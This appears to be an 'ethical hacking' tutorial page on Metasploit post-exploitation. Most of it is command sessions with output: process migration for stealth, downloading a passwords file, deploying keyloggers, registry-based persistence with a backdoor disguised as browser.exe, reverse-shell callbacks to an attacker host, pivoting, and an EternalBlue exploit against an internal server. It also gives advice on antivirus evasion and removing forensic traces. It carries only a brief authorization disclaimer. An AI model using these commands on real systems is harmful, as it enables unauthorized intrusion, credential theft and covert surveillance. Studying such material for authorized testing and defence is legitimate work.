Post-Exploitation Guide - Ethical Hacking

📚 Introduction to Post-Exploitation

Post-exploitation refers to the actions performed after successfully gaining access to a target system. This phase is crucial for maintaining access, gathering information, and expanding your foothold within a network.

Post-Exploitation Workflow

Initial Access

→

Information Gathering

→

Privilege Escalation

→

Maintain Access

→

Data Exfiltration

Key Objectives:

Maintain persistent access to the compromised system
Gather sensitive information and credentials
Escalate privileges when possible
Use compromised systems as pivot points
Avoid detection by security software

🎯 Meterpreter Basic Commands

Meterpreter is a powerful payload that provides an interactive shell for controlling compromised systems. Below are essential commands for basic operations.

Command	Description	Example
`help`	Display available commands	`> help`
`background`	Background the current session	`> background`
`sessions -l`	List all active sessions	`> sessions -l`
`sessions -i [id]`	Interact with a specific session	`> sessions -i 1`
`sysinfo`	Display system information	`> sysinfo`
`getuid`	Show current user identity	`> getuid`
`ipconfig`	Display network interface information	`> ipconfig`
`ps`	List running processes	`> ps`
`migrate [pid]`	Migrate to another process	`> migrate 2116`

Session Management Example

Backgrounding and Re-engaging Sessions


meterpreter > background

[*] Backgrounding session 1...


msf6 exploit(multi/handler) > sessions -l


Active sessions

===============

  Id  Name  Type                     Information          Connection

  --  ----  ----                     -----------          ----------

  1         meterpreter x86/windows  WIN10\User @ WIN10   192.168.1.5:4444 -> 192.168.1.10:49872


msf6 exploit(multi/handler) > sessions -i 1

[*] Starting interaction with 1...


meterpreter >

Process Migration

Why Migrate Processes?

Migrating to a more stable process (like explorer.exe) ensures:

Your session persists even if the original exploited application closes
Better stealth by hiding within legitimate system processes
Access to process-specific privileges and resources

Migration Example


meterpreter > ps

Process List

============

 PID   Name              User

 ---   ----              ----

 2116  explorer.exe      WIN10\User

 3428  chrome.exe        WIN10\User

 4592  firefox.exe       WIN10\User


meterpreter > migrate 2116

[*] Migrating from 1234 to 2116...

[*] Migration completed successfully.

📁 File System Operations

Once you have access to a system, navigating and manipulating the file system is essential for gathering intelligence and deploying additional tools.

Command	Description	Example
`pwd`	Print working directory	`> pwd`
`ls`	List files and directories	`> ls`
`cd [path]`	Change directory	`> cd C:\Users\Documents`
`cat [file]`	Display file contents	`> cat passwords.txt`
`download [file]`	Download file to attacker machine	`> download sensitive.docx`
`upload [file]`	Upload file to target machine	`> upload backdoor.exe`
`execute -f [file]`	Execute a file on target	`> execute -f tool.exe`
`shell`	Drop into system shell	`> shell`

Practical File System Example

Navigating and Exfiltrating Data


meterpreter > pwd

C:\Users\Administrator


meterpreter > ls

Listing: C:\Users\Administrator

================================

Mode              Size  Type  Last modified              Name

----              ----  ----  -------------              ----

40777/rwxrwxrwx   0     dir   2024-11-15 10:23:45 -0500  Desktop

40777/rwxrwxrwx   0     dir   2024-11-15 10:23:45 -0500  Documents

40777/rwxrwxrwx   0     dir   2024-11-15 10:23:45 -0500  Downloads


meterpreter > cd Downloads

meterpreter > ls

Listing: C:\Users\Administrator\Downloads

==========================================

Mode              Size      Type  Last modified              Name

----              ----      ----  -------------              ----

100666/rw-rw-rw-  1024      fil   2024-11-20 14:30:22 -0500  passwords.txt

100666/rw-rw-rw-  2048576   fil   2024-11-19 09:15:33 -0500  database.db


meterpreter > cat passwords.txt

admin:P@ssw0rd123

user1:SecurePass456

dbadmin:DatabaseKey789


meterpreter > download passwords.txt

[*] Downloading: passwords.txt -> /root/passwords.txt

[*] Downloaded 1.00 KiB of 1.00 KiB (100.0%): passwords.txt -> /root/passwords.txt

[*] download   : passwords.txt -> /root/passwords.txt

Uploading and Executing Tools

Deploying Additional Payloads


meterpreter > upload /root/tools/keylogger.exe

[*] uploading  : /root/tools/keylogger.exe -> keylogger.exe

[*] uploaded   : /root/tools/keylogger.exe -> keylogger.exe


meterpreter > execute -f keylogger.exe

Process 5432 created.

Channel 1 created.

⚠️ Important Notes:

Always verify file paths before uploading executables
Be cautious when executing files - they may trigger security alerts
Clean up uploaded files after operations to minimize forensic evidence

🔄 Maintaining Access (Persistence)

Persistence mechanisms ensure continued access to compromised systems even after reboots or credential changes.

Persistence Methods

🔧

Veil-Evasion Service

HTTP/TCP service backdoors

⚙️

Persistence Module

Metasploit persistence exploit

📝

Registry Keys

Startup registry entries

📅

Scheduled Tasks

Automated execution

Method 1: Veil-Evasion Service Backdoors

Veil-Evasion provides service-based backdoors that run automatically at system startup.

rev_http_service: HTTP reverse connection service
rev_tcp_service: TCP reverse connection service

Creating a Service Backdoor


# Launch Veil-Evasion

root@kali:~# veil-evasion


# List available payloads

[>] list


# Select service payload

[>] use 5

[payload/windows/service/rev_tcp_service >>] info


# Configure LHOST

[payload/windows/service/rev_tcp_service >>] set LHOST 192.168.1.5

[payload/windows/service/rev_tcp_service >>] generate

Method 2: Metasploit Persistence Module

The most reliable method combines a custom backdoor with Metasploit's persistence module.

Complete Persistence Setup


# Background current session

meterpreter > background

[*] Backgrounding session 1...


# Use persistence module

msf6 exploit(multi/handler) > use exploit/windows/local/persistence

msf6 exploit(windows/local/persistence) > show options


# Configure persistence settings

msf6 exploit(windows/local/persistence) > set DELAY 10

msf6 exploit(windows/local/persistence) > set EXE_NAME browser.exe

msf6 exploit(windows/local/persistence) > set SESSION 1

msf6 exploit(windows/local/persistence) > set STARTUP USER


# Show advanced options

msf6 exploit(windows/local/persistence) > show advanced


# Set custom executable

msf6 exploit(windows/local/persistence) > set EXE::CUSTOM /var/www/html/backdoor.exe


# Execute persistence

msf6 exploit(windows/local/persistence) > exploit


[*] Running module against WIN10

[+] Persistent agent sent to target

[*] Installed into C:\Users\Administrator\AppData\Local\Temp\

[*] Installed as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\browser

[*] Clean up Meterpreter RC File: /root/.msf4/logs/persistence/WIN10_20241127.rc

Configuration Parameters

Parameter	Description	Recommended Value
DELAY	Connection attempt interval (seconds)	10-60 seconds
EXE_NAME	Process name for backdoor	browser.exe, svchost.exe
SESSION	Active Meterpreter session ID	Current session number
STARTUP	Privilege level (USER/SYSTEM)	USER (less detectable)
EXE::CUSTOM	Path to custom backdoor	Full path to payload

Testing Persistence

Verifying Persistent Access


# Kill all sessions

msf6 exploit(windows/local/persistence) > sessions -K

[*] Killing all sessions...


# Restart target computer (simulated)

# Target reboots...


# Set up listener

msf6 exploit(windows/local/persistence) > use exploit/multi/handler

msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http

msf6 exploit(multi/handler) > set LHOST 192.168.1.5

msf6 exploit(multi/handler) > set LPORT 8080

msf6 exploit(multi/handler) > exploit


[*] Started HTTP reverse handler on http://192.168.1.5:8080

[*] http://192.168.1.5:8080 handling request from 192.168.1.10

[*] Meterpreter session 1 opened (192.168.1.5:8080 -> 192.168.1.10:49873)


meterpreter > sysinfo

Computer        : WIN10

OS              : Windows 10 (10.0 Build 19044)

Architecture    : x64

System Language : en_US

Meterpreter     : x86/windows

⚠️ Detection Risks:

Persistence mechanisms are often flagged by antivirus software
Registry modifications may trigger security alerts
Use custom, obfuscated payloads for better evasion
Consider cleanup procedures before engagement ends

⌨️ Keylogging and Screen Capture

Capturing keystrokes and screenshots provides valuable intelligence about user activities, credentials, and sensitive information.

Built-in Meterpreter Keylogger

Command	Description	Usage
`keyscan_start`	Start keystroke capture	`> keyscan_start`
`keyscan_dump`	Display captured keystrokes	`> keyscan_dump`
`keyscan_stop`	Stop keystroke capture	`> keyscan_stop`
`screenshot`	Capture screen image	`> screenshot`

Keylogging Example Scenario

Capturing Login Credentials


# Start keylogger

meterpreter > keyscan_start

Starting the keystroke sniffer ...


# User activity on target (visiting facebook.com)

# User types: facebook.com [ENTER]

# User types: [email protected] [TAB]

# User types: MySecureP@ssw0rd123 [ENTER]


# Dump captured keystrokes

meterpreter > keyscan_dump

Dumping captured keystrokes...

facebook.com<CR>

[email protected]<Tab>MySecureP@ssw0rd123<CR>


# Stop keylogger

meterpreter > keyscan_stop

Stopping the keystroke sniffer...

Result: Successfully captured email ([email protected]) and password (MySecureP@ssw0rd123) despite HTTPS encryption, as keylogging occurs at the input level before encryption.

Screen Capture Example

Taking Screenshots


meterpreter > screenshot

Screenshot saved to: /root/screenshot_2024-11-27_15-32-41.jpeg


# View on attacker machine

root@kali:~# ls -lh /root/screenshot*

-rw-r--r-- 1 root root 234K Nov 27 15:32 /root/screenshot_2024-11-27_15-32-41.jpeg


root@kali:~# xdg-open /root/screenshot_2024-11-27_15-32-41.jpeg

Keylogging Attack Flow

User Types Credentials

→

Keylogger Captures Input

→

Data Stored in Memory

→

Attacker Dumps Log

→

Credentials Exfiltrated

Advanced Keylogging Options

External Keylogger Tools:

For more advanced features, consider uploading dedicated keylogger applications:

Portable keyloggers: Standalone executables with advanced logging
Features: Application-specific capture, clipboard monitoring, time-stamped logs
Deployment: Upload via Meterpreter and execute in background

Uploading External Keylogger


meterpreter > upload /root/tools/advanced-keylogger.exe

[*] uploading  : /root/tools/advanced-keylogger.exe -> advanced-keylogger.exe

[*] uploaded   : /root/tools/advanced-keylogger.exe -> advanced-keylogger.exe


meterpreter > execute -f advanced-keylogger.exe -H

Process 6789 created.

[*] Running in background with PID 6789

⚠️ Legal and Ethical Considerations:

Keylogging without authorization is illegal in most jurisdictions
Use only on systems you own or have explicit written permission to test
Captured data may include highly sensitive personal information
Ensure proper data handling and destruction protocols

🔀 Pivoting and Network Exploitation

Pivoting allows you to use a compromised system as a gateway to access other systems on the internal network that are not directly accessible from your attacking machine.

Pivoting Network Architecture

💻

Attacker

External Network
192.168.1.5

🖥️

Compromised Host

DMZ/Gateway
192.168.1.10
10.0.0.5

🗄️

Internal Server

Internal Network
10.0.0.50

💼

Workstation

Internal Network
10.0.0.100

The compromised host acts as a pivot point, providing access to the internal network (10.0.0.0/24)

Pivoting Concept

What is Pivoting?

Pivoting is the technique of using a compromised system to attack other systems on the same network. This is crucial when:

Target systems are on internal networks not directly accessible
Firewall rules prevent direct external access
You need to appear as an internal user for attacks
Lateral movement within an organization is required

Using Autoroute for Pivoting

Autoroute is a Metasploit post-exploitation module that establishes routes through compromised systems.

Setting Up Autoroute


# From active Meterpreter session, check network interfaces

meterpreter > ipconfig


Interface  1

============

Name         : Ethernet 1

Hardware MAC : 00:0c:29:45:67:89

MTU          : 1500

IPv4 Address : 192.168.1.10

IPv4 Netmask : 255.255.255.0


Interface  2

============

Name         : Ethernet 2

Hardware MAC : 00:0c:29:45:67:8a

MTU          : 1500

IPv4 Address : 10.0.0.5

IPv4 Netmask : 255.255.255.0


# Background the session

meterpreter > background

[*] Backgrounding session 1...


# Load autoroute module

msf6 exploit(multi/handler) > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > show options


# Configure autoroute

msf6 post(multi/manage/autoroute) > set SUBNET 10.0.0.0

msf6 post(multi/manage/autoroute) > set NETMASK 255.255.255.0

msf6 post(multi/manage/autoroute) > set SESSION 1


# Execute autoroute

msf6 post(multi/manage/autoroute) > exploit


[*] Running module against WIN10

[*] Searching for subnets to autoroute.

[+] Route added to subnet 10.0.0.0/255.255.255.0 from host's routing table.

[*] Post module execution completed

Autoroute Configuration

Parameter	Description	Example
SUBNET	Target internal subnet IP	10.0.0.0
NETMASK	Subnet mask for routing	255.255.255.0
SESSION	Compromised session to pivot through	1

Exploiting Through the Pivot

Attacking Internal Systems


# Scan internal network through pivot

msf6 post(multi/manage/autoroute) > use auxiliary/scanner/portscan/tcp

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.0.0/24

msf6 auxiliary(scanner/portscan/tcp) > set PORTS 80,443,445,3389

msf6 auxiliary(scanner/portscan/tcp) > run


[+] 10.0.0.50:445 - TCP OPEN

[+] 10.0.0.50:3389 - TCP OPEN

[+] 10.0.0.100:80 - TCP OPEN

[+] 10.0.0.100:445 - TCP OPEN


# Exploit vulnerable internal system

msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/ms17_010_eternalblue

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.50

msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit


[*] Started reverse TCP handler on 192.168.1.5:4444

[*] 10.0.0.50:445 - Connecting to target for exploitation.

[+] 10.0.0.50:445 - Connection established for exploitation.

[*] Sending stage (200262 bytes) to 10.0.0.50

[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 10.0.0.50:49158)


meterpreter > sysinfo

Computer        : INTERNAL-SERVER

OS              : Windows Server 2012 R2 (6.3 Build 9600)

Architecture    : x64

System Language : en_US

Meterpreter     : x64/windows

Pivoting Attack Flow

Compromise Edge System

→

Identify Internal Networks

→

Configure Autoroute

→

Scan Internal Systems

→

Exploit Internal Targets

Additional Pivoting Techniques

Other Pivoting Methods:

Port Forwarding: Forward specific ports through the compromised host
SOCKS Proxy: Set up a SOCKS proxy for browser-based access
SSH Tunneling: Use SSH dynamic port forwarding for encrypted pivoting
VPN Deployment: Establish VPN connections for full network access

Port Forwarding Example


# Forward internal RDP port to local machine

meterpreter > portfwd add -l 3389 -p 3389 -r 10.0.0.50

[*] Local TCP relay created: :3389 <-> 10.0.0.50:3389


# Now connect to localhost:3389 to access internal server RDP

root@kali:~# rdesktop localhost:3389

⚠️ Pivoting Considerations:

Network traffic through pivots may be slower
Monitor bandwidth usage to avoid detection
Firewall rules on pivot host may affect routing
Session stability is critical - maintain multiple pivots if possible
Clean up routes and forwarding rules after assessment

📋 Post-Exploitation Summary

Complete Post-Exploitation Process

Initial Access

↓

System Enumeration

↓

Privilege Escalation

↓

Establish Persistence

↓

Data Collection

↓

Lateral Movement

Key Takeaways

Session Management: Always background sessions and maintain multiple access points
Stealth: Migrate to stable processes (explorer.exe) to avoid detection
Persistence: Use registry keys and services for reliable long-term access
Information Gathering: Collect system info, network details, and running processes
Data Exfiltration: Download sensitive files and capture credentials via keylogging
Network Expansion: Use pivoting to access internal networks and additional systems
Cleanup: Always maintain cleanup scripts to remove artifacts after assessment

Best Practices Checklist

Task	Status	Notes
✅ Migrate to stable process	Critical	Use explorer.exe or system processes
✅ Establish persistence	High Priority	Multiple methods for redundancy
✅ Document all actions	Essential	Maintain detailed logs for reporting
✅ Collect system information	High Priority	OS, architecture, users, network
✅ Identify pivot opportunities	Medium Priority	Check for multiple network interfaces
✅ Test evasion techniques	Medium Priority	Verify AV bypass effectiveness
✅ Prepare cleanup procedures	Critical	Save RC files for artifact removal